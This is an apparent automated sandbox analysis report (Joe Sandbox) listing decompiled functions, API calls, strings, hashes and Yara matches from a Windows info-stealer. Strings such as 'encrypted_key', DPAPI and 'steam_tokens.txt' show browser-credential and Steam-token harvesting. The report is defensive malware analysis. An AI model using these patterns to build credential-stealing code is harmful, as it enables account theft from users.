                                • API ID: lstrcat$CloseOpenQueryValuememset
                                • String ID:
                                • API String ID: 2623679115-0
                                • Opcode ID: dadf2c32715988031efcffc324142fd27f3ab7490d7cbdfe3480c9bae3af6011
                                • Instruction ID: 3dab51010986b611afde7957cf50ba4a99d9da6b37f56a8abe6c96b1cffe5fde
                                • Opcode Fuzzy Hash: dadf2c32715988031efcffc324142fd27f3ab7490d7cbdfe3480c9bae3af6011
                                • Instruction Fuzzy Hash: AE415275A1014C9FCB54EF64ED86FDE7778EF94304F404064B509A7291EE34AA858F91
                                Function 009B9C70 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 124memorystringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000), ref: 009B9CA8
                                • LocalAlloc.KERNEL32(00000040,?), ref: 009B9CDA
                                • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 009B9D03
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocLocallstrcpy
                                • String ID: $"encrypted_key":"$DPAPI
                                • API String ID: 2746078483-738592651
                                • Opcode ID: e421bab3d9ce9cddf6e995a4051366e38a7b790b7a3de40aab4dbb88884b2eb3
                                • Instruction ID: abca8505e43d8fc4499f4ff3ecb0fa3d0d65e0ae5ce1e23ac501184390e137c7
                                • Opcode Fuzzy Hash: e421bab3d9ce9cddf6e995a4051366e38a7b790b7a3de40aab4dbb88884b2eb3
                                • Instruction Fuzzy Hash: D641C171A202499BCF21EFA5DE857EE77B8EFD5324F044464FA55AB292DA30ED04C780
                                Function 009CE9E0 Relevance: 9.1, APIs: 6, Instructions: 110stringCOMMON
                                Download Yara Rule
                                APIs
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 009CEA24
                                • lstrcpy.KERNEL32(00000000,?), ref: 009CEA53
                                • lstrcat.KERNEL32(?,00000000), ref: 009CEA61
                                • lstrcat.KERNEL32(?,009E1794), ref: 009CEA7A
                                • lstrcat.KERNEL32(?,010C8928), ref: 009CEA8D
                                • lstrcat.KERNEL32(?,009E1794), ref: 009CEA9F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FolderPathlstrcpy
                                • String ID:
                                • API String ID: 818526691-0
                                • Opcode ID: 9c72e5ded6a1b079bdfe9d3d79995e54cbcf0f3ff401d465a663392d7ba3a3a9
                                • Instruction ID: da7c2bbdbfebab9df47223a30c35d464689c2704188a0c025c472aaad82fb6b0
                                • Opcode Fuzzy Hash: 9c72e5ded6a1b079bdfe9d3d79995e54cbcf0f3ff401d465a663392d7ba3a3a9
                                • Instruction Fuzzy Hash: 7D418A71910159AFCB55EF64DE82FED7378FFC8310F404468B61AAB291DE709E448B51
                                Function 009CECB0 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 95stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009CECDF
                                • lstrlen.KERNEL32(00000000), ref: 009CECF6
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009CED1D
                                • lstrlen.KERNEL32(00000000), ref: 009CED24
                                • lstrcpy.KERNEL32(00000000,steam_tokens.txt), ref: 009CED52
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID: steam_tokens.txt
                                • API String ID: 367037083-401951677
                                • Opcode ID: 52e3a701df67218b90305ece6d0014be7f37b17703d1a9591bb771923fa1cb93
                                • Instruction ID: 08c1e280d063907e97862d2ea7aba86ed819f9a2c1c16bb7129952bf6b45a813
                                • Opcode Fuzzy Hash: 52e3a701df67218b90305ece6d0014be7f37b17703d1a9591bb771923fa1cb93
                                • Instruction Fuzzy Hash: 55318E31A105555BC722BFB8EE4ABAE77A8EF84320F054024B847EB292DF20DC0587D2
                                Function 009B9A80 Relevance: 9.1, APIs: 6, Instructions: 67filememoryCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,009B140E), ref: 009B9A9A
                                • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,009B140E), ref: 009B9AB0
                                • LocalAlloc.KERNEL32(00000040,?,?,?,?,009B140E), ref: 009B9AC7
                                • ReadFile.KERNEL32(00000000,00000000,?,009B140E,00000000,?,?,?,009B140E), ref: 009B9AE0
                                • LocalFree.KERNEL32(?,?,?,?,009B140E), ref: 009B9B00
                                • CloseHandle.KERNEL32(00000000,?,?,?,009B140E), ref: 009B9B07
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                • String ID:
                                • API String ID: 2311089104-0
                                • Opcode ID: e2a3ce0dc79952b6c75bb135266fa660098058e077e933cf319e3b71324d09d5
                                • Instruction ID: d465f7e4ab9f47dcfde123468ae04f1c4ad3f36d4ce82454232ce336e9fb0cbd
                                • Opcode Fuzzy Hash: e2a3ce0dc79952b6c75bb135266fa660098058e077e933cf319e3b71324d09d5
                                • Instruction Fuzzy Hash: 6B112171610219AFD710DFA9DDC4AEA776CEB05750F104559FA15EB180DB709D40CBA1
                                Function 009D5AD0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 135COMMON
                                Download Yara Rule
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 009D5B14
                                  • Part of subcall function 009DA173: std::exception::exception.LIBCMT ref: 009DA188
                                  • Part of subcall function 009DA173: std::exception::exception.LIBCMT ref: 009DA1AE
                                • memmove.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 009D5B7C
                                • memmove.MSVCRT(00000000,?,?), ref: 009D5B89
                                • memmove.MSVCRT(00000000,?,?), ref: 009D5B98
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: memmove$std::exception::exception$Xinvalid_argumentstd::_
                                • String ID: vector<T> too long
                                • API String ID: 2052693487-3788999226
                                • Opcode ID: aab5785cafe26601ab8ee8f4b7ea02d3a29e27e55b4549d03d4563b0c32d243e
                                • Instruction ID: 44e4745a6980aea8d1d969eab96cb87a0ce23dbf595c2e041f89dccf0464ad7a
                                • Opcode Fuzzy Hash: aab5785cafe26601ab8ee8f4b7ea02d3a29e27e55b4549d03d4563b0c32d243e
                                • Instruction Fuzzy Hash: 12417F71B005199FCF18DF6CC995AAEBBB5EB88310F15C22AE909E7384D634DD00CB90
                                Function 009D90DD Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: String___crt$Typememset
                                • String ID:
                                • API String ID: 3530896902-3916222277
                                • Opcode ID: c9494f1919883b305b809733ba6ec083568498476708f822fe77f9085e922eed
                                • Instruction ID: 373db6b8286e45e79647a6137073cb6b07fc3ea366625856942fce1af2cb70af
                                • Opcode Fuzzy Hash: c9494f1919883b305b809733ba6ec083568498476708f822fe77f9085e922eed
                                • Instruction Fuzzy Hash: CB413B7054475C9EDB319B648C85FFBBBFC9B45304F1484E9EA9687282E2719A448F20
                                Function 009C7D40 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94COMMON
                                Download Yara Rule
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 009C7D58
                                  • Part of subcall function 009DA1C0: std::exception::exception.LIBCMT ref: 009DA1D5
                                  • Part of subcall function 009DA1C0: std::exception::exception.LIBCMT ref: 009DA1FB
                                • std::_Xinvalid_argument.LIBCPMT ref: 009C7D76
                                • std::_Xinvalid_argument.LIBCPMT ref: 009C7D91
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Xinvalid_argumentstd::_$std::exception::exception
                                • String ID: invalid string position$string too long
                                • API String ID: 3310641104-4289949731
                                • Opcode ID: 2630ecae9f18376909b5a15c6f051c0d30e6f96bc453b276d984c238c4c90cb9
                                • Instruction ID: 4f549ae1d141c10f7aa24a222ac2e0e3489095669079ab062859852381edffcb
                                • Opcode Fuzzy Hash: 2630ecae9f18376909b5a15c6f051c0d30e6f96bc453b276d984c238c4c90cb9
                                • Instruction Fuzzy Hash: BF21A5327082019BD721DEACD891F3AF7E9AFD1764F204A6EE4528B391D771DC408B66
                                Function 009D33C0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 009D33EF
                                • RtlAllocateHeap.NTDLL(00000000), ref: 009D33F6
                                • GlobalMemoryStatusEx.KERNEL32 ref: 009D3411
                                • wsprintfA.USER32 ref: 009D3437
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                                • String ID: %d MB
                                • API String ID: 2922868504-2651807785
                                • Opcode ID: c4d1869b6c7f8a6f43479898e14c669f84fb2faa7ad991fcb99f604974cc22bd
                                • Instruction ID: b291faaf53c9aa474a5c20a30607bc53497bb2a21f00dc9506d1b28c5e414154
                                • Opcode Fuzzy Hash: c4d1869b6c7f8a6f43479898e14c669f84fb2faa7ad991fcb99f604974cc22bd
                                • Instruction Fuzzy Hash: A5014C71A40244AFDB14DF98CC45BAEB7BCFB44711F00852AF906EB380DB745D0086A2
                                Function 009D2400 Relevance: 7.7, APIs: 6, Instructions: 234stringCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlenmemset
                                • String ID:
                                • API String ID: 3212139465-0
                                • Opcode ID: 33651cca351a91f8ba40dfd85d266c06886e0e02ac260e80ed929043f5bff788
                                • Instruction ID: 5b28d067f55eaa2915b7f2615c6160c1508a16c011ca2ad136cbf79a84dc447b
                                • Opcode Fuzzy Hash: 33651cca351a91f8ba40dfd85d266c06886e0e02ac260e80ed929043f5bff788
                                • Instruction Fuzzy Hash: CF81D5B1E402069BDB14DF94DC84BAEB7B9EFA4300F14C06AE908A7381EB359D45CF90
                                Function 009C7EE0 Relevance: 7.6, APIs: 5, Instructions: 120stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(00000000), ref: 009C7F31
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C7F60
                                • StrCmpCA.SHLWAPI(00000000,009E4C3C), ref: 009C7FA5
                                • StrCmpCA.SHLWAPI(00000000,009E4C3C), ref: 009C7FD3
                                • StrCmpCA.SHLWAPI(00000000,009E4C3C), ref: 009C8007
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
